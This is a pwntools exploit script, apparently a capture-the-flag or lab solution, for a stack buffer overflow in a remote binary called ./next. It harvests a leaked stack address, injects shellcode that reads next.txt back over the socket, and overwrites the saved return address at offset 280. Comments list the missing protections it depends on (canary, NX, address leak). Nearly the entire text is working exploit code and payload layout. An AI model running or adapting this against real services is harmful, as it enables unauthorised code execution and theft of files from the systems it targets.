# Proof-of-concept for a stack buffer overflow in ./next, written with pwntools.
# Everything below is a fixed-layout payload, so the script implicitly assumes
# the target exposes the following (any one of these being absent breaks it):
#   - a debug message that leaks the stack buffer's address
#     ("DEBUG: buf is at ..."), which stands in for an ASLR bypass;
#   - the saved return address sitting exactly 280 bytes past the buffer with
#     nothing in between that would be corrupted first (i.e. no stack canary);
#   - an executable stack, because control is redirected straight into the
#     buffer that holds the shellcode.
# From a hardening standpoint: stack protector, a non-executable stack (NX),
# or dropping the address leak would each defeat this exact payload.
from pwn import *

context(arch='amd64', os='linux')
e = ELF("./next")  # loaded, but not referenced anywhere below
io = remote("u.incus", 8080)
# io = remote("localhost", 8181)

# Round 1: send a benign 0x60-byte line and harvest the leaked buffer address,
# which the target prints in hex right after the "DEBUG: buf is at " marker.
io.sendline(b"A" * 0x60)
io.recvuntil(b"DEBUG: buf is at ")
buf_addr = int(io.recvline().decode().strip(), 16)
print(hex(buf_addr))

# Shellcode. The leading instruction parks rsp 1024 bytes below the buffer so
# that the stub's own stack usage cannot overwrite the injected code it is
# executing from. shellcraft.cat2 takes (path, fd, length); fd 5 is presumably
# the client connection on the server side -- TODO confirm against the target.
sc = f'''
mov rsp, {buf_addr - 1024}
'''
sc += shellcraft.cat2('next.txt', 5, 30000)
print(sc)  # assembly text, useful when debugging the payload
sc = asm(sc)

# Payload layout: [shellcode][NOP sled to 280 bytes][return address = buf_addr].
# Note that 280 - len(sc) becomes negative if the assembled stub is longer than
# 280 bytes; nothing here checks that, so the layout above would silently break.
p1 = sc + b'\x90' * (280 - len(sc)) + p64(buf_addr)
io.sendline(p1)

# Round 2: whatever the target writes back (expected to be the file contents)
# is captured until the connection closes or the 50 s timeout expires, then
# saved verbatim to 'outfile'.
res = io.recvall(timeout=50)
with open('outfile', 'wb') as fd:
    fd.write(res)
# io.interactive()